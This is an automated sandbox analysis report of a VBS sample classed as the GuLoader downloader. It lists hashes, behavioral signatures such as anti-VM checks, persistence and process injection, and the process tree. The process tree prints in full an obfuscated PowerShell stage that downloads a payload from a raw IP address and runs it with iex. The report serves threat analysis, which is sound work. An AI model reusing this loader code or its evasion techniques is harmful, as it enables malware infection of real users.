Overview

overview

10

Static

static

1

a75c770aca...b4.vbs

windows7-x64

10

a75c770aca...b4.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    12/04/2023, 03:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a75c770acab8755ebc617f8925eff3b4.vbs

  • Size

    34KB

  • MD5

    a75c770acab8755ebc617f8925eff3b4

  • SHA1

    3368ba6a1379d325bd9f0ccfe207f4963217b9c9

  • SHA256

    926fe7f70c86b5c16a632344191820206772f8c53ac075446b138d209a1bf22a

  • SHA512

    2f98c7848fcb81dc39772bc3129be29c3f22ebce2cca03da3150e9f75e2f9fd472ef4301782f91c23f65a9d6f93957e653862f723b5f99293f609430caa715a6

  • SSDEEP

    768:UObC4BcJLusxj/gqJ77UkZb3d8IbXK4HkMsFkafl:J24B2usBveebNzb6kul

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a75c770acab8755ebc617f8925eff3b4.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Unrhe9 ([String]$Unethyla){For($Uoverst=1; $Uoverst -lt $Unethyla.Length-1; $Uoverst+=(1+1)){$Told=$Told+$Unethyla.Substring($Uoverst, 1)};$Told;}$Oldtidsmi=Unrhe9 'Ph t tLp :B/r/S5P.P8N. 8F. 1 0B0c/ sKiGgCn aCl /CTKr a vHeSr s eSr . d wDpD ';$Told01=Unrhe9 'BiEeDx ';$Pixysunl194 = Unrhe9 ' \ sByUs wDo wB6 4 \TWSi nFd ogwDsNPRoRwBeFrPSMhCeKlAl \ v 1D.U0R\CpCo w eVrMsNhBe lSl .UeSx e ';.($Told01) (Unrhe9 ' $VCSoCePr c i oRnRaO2t=R$PeGn vT: wIiBn dVikrH ') ;.($Told01) (Unrhe9 'F$MPDiEx yCsPuPnAl 1R9 4F=d$UC oSe r c iUo n aA2C+B$SPSiFxMy s uMn l 1 9 4 ') ;.($Told01) (Unrhe9 'H$LTBu bKeHrS = (E(EgTwDm il TwBiDnR3f2S_ p rEo c eVsRsD -EFS PTr oKc eRs s I d = $R{MPAI D }M) . C o m m aCn dULFi n eK) -MsspSlBiqtF [ScOh aWrO]a3K4l ');.($Told01) (Unrhe9 ' $ ETlFlSeBv tSe bKe B=E $BT upb ePrB[E$ TDuAbKe r . c oKu n tD-A2S] ');.($Told01) (Unrhe9 ' $ F o rDj = (KTBeAsBt -PP aHt h O$ PGiTx y sNuKnSlD1 9 4D) D-BASnPdC P( [ IMn tJP t r ] :F:UsAiFzSeD J-Ae q 8 ) ') ;if ($Forj) {.$Pixysunl194 $Ellevtebe;} else {;$Told00=Unrhe9 'PS tSaurSt -TBBiRt s T r a nRs fMeGrM U-LS o u r cFeS $ OFl dPtKiCdSs mNiA N- DPeAsotuiSnBa tUiToSnA s$TCso e rPcCi oEnDaS2 ';.($Told01) (Unrhe9 ' $ CGo eRr cCiGoJn aU2 =B$Se nRvT: a p pKd aAtVa ') ;.($Told01) (Unrhe9 ' I mNpNoHrMtD-RM o dIuCl et BDi tEsRTdrPaPn s f eAr ') ;$Coerciona2=$Coerciona2+'\Kommaerp.ema';while (-not $Egaliser) {.($Told01) (Unrhe9 'S$ E g afluiUsUe rK= (BT eDspt - PMaGt hR $SCBo e rEcAi o n a 2O)D ') ;.($Told01) $Told00;.($Told01) (Unrhe9 ' SSt aCr tP- S lCe eAp E5 ');}.($Told01) (Unrhe9 ' $ URnVr hReV = OGBeHtQ-BC oSn tJeCnTt F$MCLoMeSr cFi oPnPaG2 ');.($Told01) (Unrhe9 'K$ MGo aEt iPnMg hS B= S[ISPyHs t eFmG.SC o nPvPeAr tD] :S:HFNr o m BBa s eP6 4MSCtVrCiFn g ( $ U nRr h eB) ');.($Told01) (Unrhe9 'T$STao lLd 2D =D f[ SPyssKtFeNmB.STSe xPtR.ME nBc oPdViun gT] :P:BAAS CSIBI . GpeOtFS tFr ihnSg ( $ MIoKa tVi n gNhF) ');.($Told01) (Unrhe9 'T$PASs tCrLo l o g iS=P$ T o lPd 2C.Ws u b s t rRiGnAgC( 1 8G3 9 8T3p,S1S9N7A2N5K)P ');.($Told01) $Astrologi;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1256
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Unrhe9 ([String]$Unethyla){For($Uoverst=1; $Uoverst -lt $Unethyla.Length-1; $Uoverst+=(1+1)){$Told=$Told+$Unethyla.Substring($Uoverst, 1)};$Told;}$Oldtidsmi=Unrhe9 'Ph t tLp :B/r/S5P.P8N. 8F. 1 0B0c/ sKiGgCn aCl /CTKr a vHeSr s eSr . d wDpD ';$Told01=Unrhe9 'BiEeDx ';$Pixysunl194 = Unrhe9 ' \ sByUs wDo wB6 4 \TWSi nFd ogwDsNPRoRwBeFrPSMhCeKlAl \ v 1D.U0R\CpCo w eVrMsNhBe lSl .UeSx e ';.($Told01) (Unrhe9 ' $VCSoCePr c i oRnRaO2t=R$PeGn vT: wIiBn dVikrH ') ;.($Told01) (Unrhe9 'F$MPDiEx yCsPuPnAl 1R9 4F=d$UC oSe r c iUo n aA2C+B$SPSiFxMy s uMn l 1 9 4 ') ;.($Told01) (Unrhe9 'H$LTBu bKeHrS = (E(EgTwDm il TwBiDnR3f2S_ p rEo c eVsRsD -EFS PTr oKc eRs s I d = $R{MPAI D }M) . C o m m aCn dULFi n eK) -MsspSlBiqtF [ScOh aWrO]a3K4l ');.($Told01) (Unrhe9 ' $ ETlFlSeBv tSe bKe B=E $BT upb ePrB[E$ TDuAbKe r . c oKu n tD-A2S] ');.($Told01) (Unrhe9 ' $ F o rDj = (KTBeAsBt -PP aHt h O$ PGiTx y sNuKnSlD1 9 4D) D-BASnPdC P( [ IMn tJP t r ] :F:UsAiFzSeD J-Ae q 8 ) ') ;if ($Forj) {.$Pixysunl194 $Ellevtebe;} else {;$Told00=Unrhe9 'PS tSaurSt -TBBiRt s T r a nRs fMeGrM U-LS o u r cFeS $ OFl dPtKiCdSs mNiA N- DPeAsotuiSnBa tUiToSnA s$TCso e rPcCi oEnDaS2 ';.($Told01) (Unrhe9 ' $ CGo eRr cCiGoJn aU2 =B$Se nRvT: a p pKd aAtVa ') ;.($Told01) (Unrhe9 ' I mNpNoHrMtD-RM o dIuCl et BDi tEsRTdrPaPn s f eAr ') ;$Coerciona2=$Coerciona2+'\Kommaerp.ema';while (-not $Egaliser) {.($Told01) (Unrhe9 'S$ E g afluiUsUe rK= (BT eDspt - PMaGt hR $SCBo e rEcAi o n a 2O)D ') ;.($Told01) $Told00;.($Told01) (Unrhe9 ' SSt aCr tP- S lCe eAp E5 ');}.($Told01) (Unrhe9 ' $ URnVr hReV = OGBeHtQ-BC oSn tJeCnTt F$MCLoMeSr cFi oPnPaG2 ');.($Told01) (Unrhe9 'K$ MGo aEt iPnMg hS B= S[ISPyHs t eFmG.SC o nPvPeAr tD] :S:HFNr o m BBa s eP6 4MSCtVrCiFn g ( $ U nRr h eB) ');.($Told01) (Unrhe9 'T$STao lLd 2D =D f[ SPyssKtFeNmB.STSe xPtR.ME nBc oPdViun gT] :P:BAAS CSIBI . GpeOtFS tFr ihnSg ( $ MIoKa tVi n gNhF) ');.($Told01) (Unrhe9 'T$PASs tCrLo l o g iS=P$ T o lPd 2C.Ws u b s t rRiGnAgC( 1 8G3 9 8T3p,S1S9N7A2N5K)P ');.($Told01) $Astrologi;}"
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1956
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          4⤵
          • Checks QEMU agent file
          • Adds Run key to start application
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetWindowsHookEx
          PID:1276

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    61KB

    MD5

    e71c8443ae0bc2e282c73faead0a6dd3

    SHA1

    0c110c1b01e68edfacaeae64781a37b1995fa94b

    SHA256

    95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

    SHA512

    b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    304B

    MD5

    069fd8079d43d20598bfe6ae99b1c26c

    SHA1

    e19a61ddcc7ca18e370a2c8be031fc0cf9c6b65a

    SHA256

    09cabd6d9987064a893ad16157eb084057b0d56eed7a3dd1e159b248651f548e

    SHA512

    ec055e0db715bb1e2113d5dff5eb9ce85a869bfab9fc6b20646aa7b1d650fe40181f1fd0101b0a74d3318f48e9dfd4ad27d69a22313201f6e492478d7ebba527

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabBB54.tmp
    Filesize

    61KB

    MD5

    e71c8443ae0bc2e282c73faead0a6dd3

    SHA1

    0c110c1b01e68edfacaeae64781a37b1995fa94b

    SHA256

    95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

    SHA512

    b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JI3GVPU0JGAJ3VIK6VTL.temp
    Filesize

    7KB

    MD5

    1ccdea49ee7f63b92273d2b15ea05d2c

    SHA1

    27407ae33b2230f9902989f4bdd7c1b3dcc0033d

    SHA256

    de0f011ce6e3bc39e0f4198747f50cb34c37d572881b14dd4372ba64cd68ac90

    SHA512

    cd2cb7732a4eb3ba3816665a25c205f50bb1552ac98be645e18aae4e53812e351aee25edb779be22479eb7e4bf7f3529e6ef1bf07d36fe723b01624ccda6abfb

    Download Submit

  • memory/1256-78-0x00000000028D0000-0x0000000002950000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1256-95-0x00000000028D0000-0x0000000002950000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1256-75-0x000000001B290000-0x000000001B572000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1256-98-0x00000000028D0000-0x0000000002950000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1256-79-0x00000000028D0000-0x0000000002950000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1256-77-0x00000000028D0000-0x0000000002950000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1256-76-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1256-97-0x00000000028D0000-0x0000000002950000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1256-96-0x00000000028D0000-0x0000000002950000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1276-105-0x0000000000620000-0x0000000001A08000-memory.dmp

    Filesize

    19.9MB

    Download

  • memory/1276-110-0x0000000000620000-0x0000000001A08000-memory.dmp

    Filesize

    19.9MB

    Download

  • memory/1276-108-0x0000000000620000-0x0000000001A08000-memory.dmp

    Filesize

    19.9MB

    Download

  • memory/1276-107-0x0000000000400000-0x0000000000615000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/1276-106-0x0000000000620000-0x0000000001A08000-memory.dmp

    Filesize

    19.9MB

    Download

  • memory/1956-82-0x0000000002660000-0x00000000026A0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1956-103-0x0000000005B10000-0x0000000005B11000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1956-102-0x0000000006110000-0x00000000074F8000-memory.dmp

    Filesize

    19.9MB

    Download

  • memory/1956-100-0x0000000002660000-0x00000000026A0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1956-99-0x0000000002660000-0x00000000026A0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1956-83-0x0000000002660000-0x00000000026A0000-memory.dmp

    Filesize

    256KB

    Download